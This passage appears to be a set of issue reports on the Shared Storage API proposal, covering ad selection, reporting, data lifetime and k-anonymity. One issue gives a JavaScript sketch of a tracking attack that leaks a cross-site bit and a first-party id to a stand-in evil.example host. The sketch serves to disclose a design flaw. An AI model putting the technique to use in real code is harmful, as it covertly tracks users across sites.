   {url: "blob:https://c.example/789…"}],
  {data: {name: "experimentA"}});

We would then use this metadata to hook up to window.fence.reportEvent().
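For example, inside the fenced frame rendered from the selected URL, the metadata might then be consumed roughly as follows; this is a sketch based on the fenced frames reportEvent() shape, and the destination value is an assumption:

// Inside the fenced frame: trigger the event-level report declared for the chosen URL.
window.fence.reportEvent({
  eventType: 'click',                          // matches the report_event declared above
  eventData: 'ad clicked',
  destination: ['shared-storage-select-url'],  // assumed destination enum value
});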

In the long term, however, we will not be able to support this type of reporting, as it can be used to leak the index simply by using a distinct report_url for each candidate Fenced Frame url.

We welcome feedback on this proposal.

Use of Shared Storage API for ad selection and buyer/seller roles in the ecosystem

Shared Storage API offers interesting primitives that can potentially be useful for selecting ads based on criteria that needs some cross-site information, for example, to enable browser-level frequency capping, while protecting users from tracking across sites. The current proposal includes a selectURL function, which allows an embedded third-party origin to select one of a small number of URLs to render, delegating the choice to a snippet of JavaScript logic running inside an isolated worklet. The feature can help serve ads that are targeted mainly based on contextual, single-site criteria server-side, but need an additional post-filtering step applied based on cross-site knowledge.

That said, the current programmatic ads ecosystem typically involves not one but multiple participants working together to select and serve the best ad. Often, this includes at least a buyer (such as a DSP), who represents an advertiser or an agency, and a seller (such as an SSP), who represents a publisher.

Can there be a practical way to adapt the Shared Storage API and, specifically, its URL selection feature, to the ad selection process that involves the roles of buyers and sellers working together to select the best (for example, highest-paying) ad?

These two roles can translate into different requirements.

Buyers may want to:

  • Use the Shared Storage API to apply business logic (such as frequency caps enforcement) based on cross-site information on-device, and select a subset of eligible ads from a larger set (likely determined server-side, perhaps, based on contextual or single-site targeting).

  • Extra credit: adjust bid value for an ad based on cross-site information (e.g., apply bid discounts for subsequent impressions).

  • Be able to write to the Shared Storage upon rendering their ad.

Sellers may want to:

  • Let buyers use the Shared Storage API within the context of their origin to select a subset of ads eligible to serve (e.g., meeting campaign frequency caps) from a larger set.

  • Select a winning ad (for example, top-ranked by its publisher payout) from the set of ads that the buyers’ logic within worklets determined as eligible to be shown to an end user.

  • Propagate the information buyers may need for running their on-device logic inside worklets with the Shared Storage API (for example, campaign frequency caps from the contextual bid responses).

The Shared Storage API suggests that logic operating on cross-site data should run inside isolated worklets to protect it from exfiltration. Can the API support multiple worklets orchestrated in a way that supports both buyer- and seller-specific URL selection logic, such that the seller logic (a) can select an ad URL to render among the ad URL(s) selected by different buyers and (b) does not have access to any buyer's origin shared storage?

Note: some ideas here sound similar to FLEDGE and its on-device auction. I’ll raise a separate issue about the relationship between FLEDGE and Shared Storage API for ad selection use cases.

Resetting every 30 days overly restrictive?

In an effort to reduce the scope of joining user ids across sites, Shared Storage will delete an origin's contents 30 days after the first entry is written. This is perhaps overly restrictive, and prohibitive, for our users. For one, outside of the worklet, the caller has no idea how long the data will persist. It may be day 29, and writing a new key on the 29th day will result in it being deleted the next day. But also, there are use cases (such as reach) that will need to extend beyond 30 days.

An alternative proposal is to reduce the scope of joining user ids across sites without further interaction with the origin. This brings it closer to what FLEDGE is doing. That is, if a FLEDGE interest group already exists, and is written to again, its expiration time is reset. We could do the same thing with Shared Storage. If a key is written to (or would be written to if it didn't already exist), its timestamp is reset. This ensures that keys persist for at least 30 days, and can be extended longer so long as the origin sees the user again and updates the value.

Thoughts welcome.

Problem with sharedStorage's described use of k-anonymity

The explainer says:

"""
selectURL() returns a promise that resolves into an opaque URL for the URL selected from urls.

  • urls is a list of dictionaries, each containing a candidate URL url and optional reporting metadata (a dictionary, with the key being the event type and the value being the reporting URL; identical to FLEDGE's registerAdBeacon() parameter), with a max length of 8.
    • The url of the first dictionary in the list is the default URL. This is selected if there is a script error, or if there is not enough budget remaining, or if the selected URL is not yet k-anonymous.
    • The selected URL will be checked to see if it is k-anonymous. If it is not, its k-anonymity will be incremented, but the default URL will be returned.
    • The reporting metadata will be used in the short-term to allow event-level reporting via window.fence.reportEvent() as described in the FLEDGE explainer.

"""

This design has the following flaw: The default URL is not necessarily k-anonymous and may be used to join first/third-party information. For example:

Suppose selectURL([url1, url2, url3]) picks url2 if some third-party bit is 0 and url3 if the bit is 1. Let url3 be above the k-anonymity threshold, but not url1 or url2.

If the third party bit is 0 (or repeat with a different selection algorithm for 1), url1 will be loaded even though it isn't k-anonymous and joins a bit of cross-site data (e.g. the URL could be "https://evil.com?first_party_id=unique_id&third_party_bit=0"). You can repeat this process to extract arbitrarily many bits of cross-site data to the server (if the server is untrusted; otherwise you just get a single k-anonymity violation + 1-bit leak locally).
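A minimal sketch of this attack, assuming the selectURL() shape from the explainer and a hypothetical previously stored key 'third-party-bit':

// leak.js (worklet): choose between url2 and url3 based on a stored cross-site bit.
class LeakOneBitOperation {
  async run(data, urls) {
    const bit = await this.sharedStorage.get('third-party-bit');
    return bit === '1' ? 2 : 1;   // index 0 is the default URL
  }
}
register('leak-one-bit', LeakOneBitOperation);

// Embedder: only url3 is k-anonymous, so whenever the bit is 0 the non-k-anonymous
// default (url1), which carries the first-party id, is what actually gets loaded.
const config = await window.sharedStorage.selectURL('leak-one-bit', [
  {url: 'https://evil.example/?first_party_id=unique_id&third_party_bit=0'},  // url1 (default)
  {url: 'https://evil.example/?bit=0'},                                       // url2 (not k-anonymous)
  {url: 'https://evil.example/?bit=1'},                                       // url3 (k-anonymous)
], { resolveToConfig: true });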

We want to ensure the following property:

  • The selected URL is independent of third-party information OR The selected URL is k-anonymous.

We can achieve this with an additional check at the start, as follows:

  • If the first URL (the default URL) is not k-anonymous, select it (or even return an error) and increment its k-anonymity.
  • If the first URL is k-anonymous, proceed with the above design.

Key Lifetime

No mention is made of how long keys are persisted. The set() and append() calls should include an optional parameter that allows the lifetime to be specified. This should default to something like 30 days. If set() is called on an existing key with ignoreIfPresent true, its lifetime should still be updated. You could either always update it to the newly specified expiration or to the latest of its current expiration and its newly specified expiration.
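A minimal sketch of the proposed option (the option name and units are illustrative, not part of the current API):

// Hypothetical: an explicit lifetime on set()/append(), as suggested above.
await window.sharedStorage.set('campaign-state', 'some-state', {
  ignoreIfPresent: true,
  lifetimeDays: 30,   // even if the value is left untouched, this write refreshes the expiration
});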
